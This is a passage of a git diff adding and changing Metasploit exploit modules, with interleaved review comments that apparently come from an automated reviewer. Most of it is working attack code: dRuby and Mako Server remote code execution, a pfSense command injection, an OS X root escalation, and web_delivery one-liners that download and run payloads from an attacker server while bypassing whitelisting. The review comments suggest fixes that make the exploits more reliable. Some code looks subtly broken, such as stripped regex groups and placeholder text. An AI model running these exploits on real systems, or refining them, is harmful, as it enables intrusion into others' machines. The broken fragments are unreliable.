= {}) super(update_info(info, 'Name' => 'Distributed Ruby Remote Code Execution', 
@@ -31,30 +33,26 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ - ['Automatic', {}], + ['Automatic', { method: 'auto'}], + ['Trap', { method: 'trap'}], + ['Eval', { method: 'instance_eval'}], + ['Syscall', { method: 'syscall'}], ], 'DisclosureDate' => 'Mar 23 2011', 'DefaultTarget' => 0)) - register_options( [ - OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]), + OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]), + Opt::RHOST(nil, false), + Opt::RPORT(8787) ]) end - def exploit - serveruri = datastore['URI'] - DRb.start_service - p = DRbObject.new_with_uri(serveruri) - class << p - undef :send - end - - p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") - # syscall to decide whether it's 64 or 32 bit: - # it's getpid on 32bit which will succeed, and writev on 64bit - # which will fail due to missing args + def method_trap(p) + p.send(:trap, 23, + :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend") + # Decide if this is running on an x86 or x64 target, using the kill(2) syscall begin pid = p.send(:syscall, 20) p.send(:syscall, 37, pid, 23) 
@@ -65,4 +63,89 @@ class MetasploitModule < Msf::Exploit::Remote end p.send(:my_eval, payload.encoded) end + + def method_instance_eval(p) + p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }") + end + + def method_syscall(p) + filename = "." + Rex::Text.rand_text_alphanumeric(16) + + begin + # Decide if this is running on an x86 or x64 target. + # This syscall number is getpid on x86, which will succeed, + # or writev on x64, which will fail due to missing args. + j = p.send(:syscall, 20) + # syscall open + i = p.send(:syscall, 8, filename, 0700) + # syscall write + p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) + # syscall close + p.send(:syscall, 6, i) + # syscall fork + p.send(:syscall, 2) + # syscall execve + p.send(:syscall, 11, filename, 0, 0) + print_status("attempting x86 execve of #(unknown)") + + # likely x64 + rescue Errno::EBADF + # syscall creat + i = p.send(:syscall, 85, filename, 0700) + # syscall write + p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10) + # syscall close + p.send(:syscall, 3, i) + # syscall fork + p.send(:syscall, 57) + # syscall execve + p.send(:syscall, 59, filename, 0, 0) + print_status("attempting x64 execve of #(unknown)") + end + + register_file_for_cleanup(filename) if filename + end + + def exploit + if !datastore['URI'].blank? && !datastore['RHOST'].blank? + print_error("URI and RHOST are specified, unset one") + return + end + + if datastore['URI'].blank? && datastore['RHOST'].blank? + print_error("neither URI nor RHOST are specified, set one") + return + end + + unless datastore['URI'].blank? 
+ serveruri = datastore['URI'] + (datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':') + else + serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}" + end + + DRb.start_service + p = DRbObject.new_with_uri(serveruri) + class << p + undef :send + end + + if target[:method] == 'auto' + methods = ["instance_eval", "syscall", "trap"] + else + methods = [target[:method]] + end + + methods.each do |method| + begin + print_status("Trying to exploit #{method} method") + send("method_" + method, p) + handler(nil) + break + rescue SecurityError, DRb::DRbConnError, NoMethodError + print_warning("Target is not vulnerable to #{method} method") + end + end + + end end diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index 32938f148d..39f9808be1 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => ARCH_X86, 'Platform' => 'linux', 'References' => diff --git a/modules/exploits/linux/smtp/haraka.py b/modules/exploits/linux/smtp/haraka.py index 7033d90ef2..59dff0bb03 100755 --- a/modules/exploits/linux/smtp/haraka.py +++ b/modules/exploits/linux/smtp/haraka.py @@ -72,6 +72,7 @@ def send_mail(to, mailserver, cmd, mfrom, port): except smtplib.SMTPDataError as err: if err[0] == 450: module.log("Triggered bug in target server (%s)"%err[1], 'good') + s.close() return(True) module.log("Bug not triggered in target server", 'error') module.log("it may not be vulnerable or have the attachment plugin activated", 'error') diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 0d528c7a77..e436abba9d 100644 --- a/modules/exploits/multi/handler.rb 
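Review bot: The new URI parsing `serveruri.sub(/druby:\/\//i, '').split(':')` assigns whatever follows the host to RPORT, so `druby://host` leaves RPORT nil and an IPv6 literal is split on the wrong colon; neither case is reported before `DRbObject.new_with_uri` is called with a half-built datastore. I would parse once and validate: `host, port = serveruri.sub(/\Adruby:\/\//i, '').split(':', 2)` followed by `fail_with(Failure::BadConfig, 'URI must be druby://host:port') if host.blank? || port.blank?`. In `method_syscall`, `register_file_for_cleanup(filename) if filename` has a redundant guard (`filename` is always a non-empty String) and the file is dropped in whatever working directory the DRb server runs in, which deserves a comment for operators. The `methods.each` loop also `break`s after the first method that does not raise, treating "no exception" as success; a method may fail without raising, so checking `session_created?` before breaking would be more reliable.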
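Review bot: `s.close()` is added only inside the `450` branch, so the remaining exits of `send_mail` (the "Bug not triggered" path just below and, presumably, the success path outside this hunk) still leave the SMTP socket open. Wrapping the send in `try: ... finally: s.close()` closes it on every path and removes the need for per-branch calls. send_mail starts and ends outside this hunk.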
+++ b/modules/exploits/multi/handler.rb @@ -34,7 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_ALL, 'Targets' => [ [ 'Wildcard Target', {} ] ], 'DefaultTarget' => 0, - 'Stance' => Msf::Exploit::Stance::Passive ) ) @@ -42,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote [ OptBool.new( "ExitOnSession", - [ true, "Return from the exploit after a session has been created", false ] + [ true, "Return from the exploit after a session has been created", true ] ), OptInt.new( "ListenerTimeout", @@ -58,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote loop do break if session_created? && datastore['ExitOnSession'] break if timeout > 0 && (stime + timeout < Time.now.to_f) - sleep(1) + Rex::ThreadSafe.sleep(1) end end end diff --git a/modules/exploits/multi/http/makoserver_cmd_exec.rb b/modules/exploits/multi/http/makoserver_cmd_exec.rb new file mode 100644 index 0000000000..9355b7b48c --- /dev/null +++ b/modules/exploits/multi/http/makoserver_cmd_exec.rb 
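Review bot: Flipping the ExitOnSession default to `true` is a user-visible change for anyone running `exploit -j` and expecting the listener to keep accepting sessions, yet the option text is unchanged and nothing in the module tells them so. I would extend the description, e.g. `"Return from the exploit after a session has been created (set to false to keep the listener open for multiple sessions)"`, so the new default is discoverable from `show options`. Removing `Stance::Passive` at the same time is not explained; if it is intentional, a short comment on why the handler no longer declares itself passive would help.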
@@ -0,0 +1,129 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mako Server v2.5, 2.6 OS Command Injection RCE', + 'Description' => %q{ + This module exploits a vulnerability found in Mako Server v2.5, 2.6. + It's possible to inject arbitrary OS commands in the Mako Server + tutorial page through a PUT request to save.lsp. + + Attacker input will be saved on the victims machine and can + be executed by sending a GET request to manage.lsp. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC + 'Steven Patterson (Shogun Lab) ' # Metasploit module + ], + 'References' => + [ + ['EDB', '42683'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] + ], + 'Arch' => ARCH_CMD, + 'Platform' => %w[win unix], + 'Targets' => + [ + ['Mako Server v2.5, 2.6', {}] + ], + 'DefaultTarget' => 0, + 'Privileged' => false, + 'DisclosureDate' => 'Sep 3 2017')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'URI path to the Mako Server app', '/']) + ] + ) + end + + def check + vprint_status('Trying to detect running Mako Server and necessary files...') + + # Send GET request to determine existence of save.lsp page + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp') + }, 20) + + # If response does not include "MakoServer.net", target is not viable. 
+ if res.headers['Server'] !~ /MakoServer\.net/ + vprint_warning('Target is not a Mako Server.') + return CheckCode::Safe + end + + if res.body + if res.body.include?('Incorrect usage') + # We are able to determine that the server has a save.lsp page and + # returns the correct output. + vprint_status('Mako Server save.lsp returns correct ouput.') + return CheckCode::Appears + else + # The page exists, but is not returning the expected output. + # May be a different version? + vprint_warning('Mako Server save.lsp did not return expected output.') + return CheckCode::Detected + end + else + # The above checks failed and exploitability could not be determined. + vprint_error('Unable to determine exploitability, save.lsp not found.') + return CheckCode::Unknown + end + + CheckCode::Safe + end + + def exploit + print_status('Sending payload to target...') + + # The double square brackets helps to ensure single/double quotes + # in cmd payload do not interfere with syntax of os.execute Lua function. + cmd = %{os.execute([[#{payload.encoded}]])} + + # If users want to troubleshoot their cmd payloads, they can see the + # Lua function with params that the module uses in a more verbose mode. 
+ vprint_status("Now executing the following command: #{cmd}") + + # Send a PUT request to save.lsp with command payload + begin + vprint_status('Sending PUT request to save.lsp...') + send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp'), + 'ctype' => 'text/plain', + 'data' => cmd, + 'vars_get' => { + 'ex' => '2.1' + } + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + + # Send a GET request to manage.lsp with execute set to true + begin + vprint_status('Sending GET request to manage.lsp...') + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'examples/manage.lsp'), + 'vars_get' => { + 'execute' => 'true', + 'ex' => '2.1', + 'type' => 'lua' + } + }, 20) + rescue StandardError => e + fail_with(Failure::NoAccess, "Error: #{e}") + end + end +end diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index ae77b0dae1..4d291640ff 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows. }, - 'Author' => [ 'hdm', 'patrick' ], + 'Author' => [ 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ @@ -164,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote if (target.name =~ /Windows/) - # patrickw + # aushack # # Tested during pen test against Windows 2003 server. # Windows Service details: diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index b742744d91..89b2625eac 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb 
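Review bot: `check` dereferences `res` before testing it, so a timeout (where `send_request_cgi` returns nil) raises NoMethodError on `res.headers` instead of returning `CheckCode::Unknown`; add `return CheckCode::Unknown unless res` before the Server-header test. The `if res.body` branch is also misleading: a Rex response body is a String, so the `else` that returns `Unknown` and the trailing `CheckCode::Safe` are effectively unreachable, and `res.body.include?('Incorrect usage')` with a single `else` is clearer. In `exploit`, the `[[...]]` long-bracket string only protects the payload while it contains no `]]`; since `payload.encoded` is operator-supplied CMD text, I would `fail_with(Failure::BadConfig, 'payload must not contain "]]"') if payload.encoded.include?(']]')` before building `cmd`, and check the PUT/GET response codes instead of only rescuing exceptions.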
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote allows direct console access as root or SYSTEM from any source address. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 71b32d439e..be0cd9c9a7 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 9adc1dacb4..c73bbff5f7 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking + include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer 
@@ -15,22 +16,34 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command will start the specified scripting language interpreter and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. When using either of the PSH targets, ensure the - payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute - x86 payloads on x64 machines. + This module quickly fires up a web server that serves a payload. + The provided command which will allow for a payload to download and execute. + It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe + for bypassing application whitelisting. The main purpose of this module is to quickly establish + a session on a target machine when the attacker has to manually type in the command: + e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. + This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + + When using either of the PSH targets, ensure the payload architecture matches the target computer + or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. + + Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. + The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included + PowerShell command inside of it. 
Both web requests (i.e., the .sct file and PowerShell download/execute) + can occur on the same port. + + "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! + 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! + 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) + 'Trenton Ivey', # AppLocker MSF Module (kn0) + 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features ], 'DefaultOptions' => { @@ -38,10 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] + ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => 
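Review bot: The rewritten description now contradicts itself: it keeps "This attack vector does not write to disk" and, a few lines later, adds that "PSH (Binary)" writes a file to disk, so an operator skimming the first paragraph gets the wrong assurance for that target. I would qualify the first claim, e.g. `With the script targets this attack vector does not write to disk ...`, and tidy the new sentence `It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe` to `It does this either through the specified scripting language interpreter or via the "squiblydoo" regsvr32.exe technique`. The "for bypassing application whitelisting" clause appears twice in the paragraph and one mention is enough.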
@@ -57,45 +71,114 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['Regsvr32', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), + OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), + ], self.class + ) end + + def primer + php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") + python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") + regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) + + print_status("Run the following command on the target machine:") + case target.name + when 'PHP' + print_line("#{php}") + when 'Python' + print_line("#{python}") + when 'PSH' + psh = gen_psh("#{get_uri}", "string") + print_line("#{psh}") + when 'Regsvr32' + print_line("#{regsvr}") + when 'PSH (Binary)' + psh = gen_psh("#{get_uri}", "download") + print_line("#{psh}") + end + end + + def on_request_uri(cli, _request) - print_status('Delivering Payload') - if target.name.include? 'PSH' + if _request.raw_uri =~ /\.sct$/ + psh = gen_psh("#{get_uri}", "string") + data = gen_sct_file(psh) + elsif target.name.include? 'PSH (Binary)' + data = generate_payload_exe + elsif target.name.include? 'PSH' or target.name.include? 
'Regsvr32' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded} ) + data = %Q(#{payload.encoded}) + end + + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering Payload") + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - def primer - url = get_uri - print_status('Run the following command on the target machine:') - case target.name - when 'PHP' - print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") - when 'Python' - print_line('Python:') - print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") - when 'PSH' + + def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? 
"$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#(unknown)')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file) + end + download_and_run = "#{ignore_cert}#{download_string}" - print_line generate_psh_command_line( - noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + %{} end end diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb new file mode 100644 index 0000000000..ff11728624 --- /dev/null +++ b/modules/exploits/osx/local/root_no_password.rb 
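Review bot: In `gen_psh` the download branch reads `datastore['BinaryEXE-FILENAME']` and `datastore['BinaryEXE-PATH']`, but the advanced options registered in `initialize` (whose start is outside this hunk) are named `PSHBinary-FILENAME` and `PSHBinary-PATH`, so user-supplied values are silently ignored and the random filename and `$env:temp` are always used. Change the two reads to `filename = datastore['PSHBinary-FILENAME'].blank? ? random : datastore['PSHBinary-FILENAME']` and `path = datastore['PSHBinary-PATH'].blank? ? "$env:temp" : %Q('#{datastore['PSHBinary-PATH']}')`. In `on_request_uri`, `target.name.include? 'PSH' or target.name.include? 'Regsvr32'` should use `||` — `or` has lower precedence than assignment and is a known trap — and the parameter is named `_request` yet is read twice, so drop the underscore. The `*method` splat in `gen_psh(url, *method)` is only ever passed a single string; a plain `method` parameter (or a symbol keyword such as `mode:`) would document the contract better and avoid shadowing `Kernel#method`.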
@@ -0,0 +1,60 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X Root Privilege Escalation', + 'Description' => %q{ + This module exploits a serious flaw in MacOSX High Sierra. + Any user can login with user "root", leaving an empty password. + }, + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], + [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], + [ 'URL', 'https://forums.developer.apple.com/thread/79235' ], + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'Author' => [ + 'chethan177', # earliest public discovery + 'lemiorhan', # making this well-known via Twitter + 'timwr', # Metasploit module + ], + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 29 2017' + )) + end + + def exploit_cmd(root_payload) + "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" + end + + def exploit + payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + print_status("Writing payload file as '#{payload_file}'") + write_file(payload_file, payload.raw) + register_file_for_cleanup(payload_file) + output = cmd_exec("chmod +x #{payload_file}") + print_status("Executing payload file as '#{payload_file}'") + cmd_exec(exploit_cmd(payload_file)) + end +end 
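Review bot: In `exploit`, `output = cmd_exec("chmod +x #{payload_file}")` assigns a local that is never used, and the preceding `write_file` result is not checked, so a failed write still proceeds to the osascript call and reports "Executing payload file". If `write_file` returns a falsy value on failure (as I believe the `Msf::Post::File` mixin does — worth confirming), guard it with `fail_with(Failure::Unknown, "Failed to write #{payload_file}") unless write_file(payload_file, payload.raw)` and drop the `output =` assignment. The `cmd_exec(exploit_cmd(payload_file))` result is likewise discarded, so a rejected authorization prompt cannot be distinguished from success; at least `vprint_status` the returned output.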
diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index 983320b10b..1714f4286b 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote to enable remote command execution as the Apache user. By setting SkipEscalation to false, this module will attempt to setuid the bash shell. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_CMD ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/unix/http/pfsense_group_member_exec.rb b/modules/exploits/unix/http/pfsense_group_member_exec.rb new file mode 100644 index 0000000000..ff3708fb89 --- /dev/null +++ b/modules/exploits/unix/http/pfsense_group_member_exec.rb 
@@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'pfSense authenticated group member RCE', + 'Description' => %q( + pfSense, a free BSD based open source firewall distribution, + version <= 2.3.1_1 contains a remote command execution + vulnerability post authentication in the system_groupmanager.php page. + Verified against 2.2.6 and 2.3. + ), + 'Author' => + [ + 's4squatch', # discovery + 'h00die' # module + ], + 'References' => + [ + [ 'EDB', '43128' ], + [ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => + { + 'SSL' => true, + 'PAYLOAD' => 'cmd/unix/reverse_openssl' + }, + 'Arch' => [ ARCH_CMD ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl openssl' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 06 2017' + ) + ) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']), + Opt::RPORT(443) + ], self.class + ) + end + + def login + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? 
+ vprint_status("CSRF Token for login: #{csrf}") + + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'POST', + 'vars_post' => { + '__csrf_magic' => csrf, + 'usernamefld' => datastore['USERNAME'], + 'passwordfld' => datastore['PASSWORD'], + 'login' => '' + } + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + if res.code == 302 + vprint_status('Successful Authentication') + return res.get_cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + return nil + end + end + + def detect_version(cookie) + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET', + 'cookie' => cookie + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + /Version.+(?[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body + if version + print_status("pfSense Version Detected: #{version}") + return Gem::Version.new(version) + end + # If the device isn't fully setup, you get stuck at redirects to wizard.php + # however, this does NOT stop exploitation strangely + print_error("pfSens Version Not Detected or wizard still enabled.") + Gem::Version.new('0.0') + end + + def check + begin + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? 
+ fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + if /Login to pfSense/ =~ res.body + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + cookie = login + version = detect_version(cookie) + vprint_good('Login Successful') + res = send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'GET', + 'cookie' => cookie, + 'vars_get' => { + 'act' => 'new' + } + ) + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_status("CSRF Token for group creation: #{csrf}") + + group_name = rand_text_alpha(10) + post_vars = { + '__csrf_magic' => csrf, + 'groupname' => group_name, + 'description' => '', + 'members[]' => "0';#{payload.encoded};'", + 'groupid' => '', + 'save' => 'Save' + } + if version >= Gem::Version.new('2.3') + post_vars = post_vars.merge('gtype' => 'local') + elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed + post_vars = post_vars.merge( + 'act' => '', + 'gtype' => '', + 'privid' => '' + ) + end + send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'POST', + 'cookie' => cookie, + 'vars_post' => post_vars, + 'vars_get' => { + 'act' => 'edit' + } + ) + print_status("Manual removal of group #{group_name} is required.") + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/exploits/unix/http/tnftp_savefile.rb similarity index 83% rename from modules/auxiliary/server/tnftp_savefile.rb rename to modules/exploits/unix/http/tnftp_savefile.rb index bcce71a02b..57e9961e94 100644 
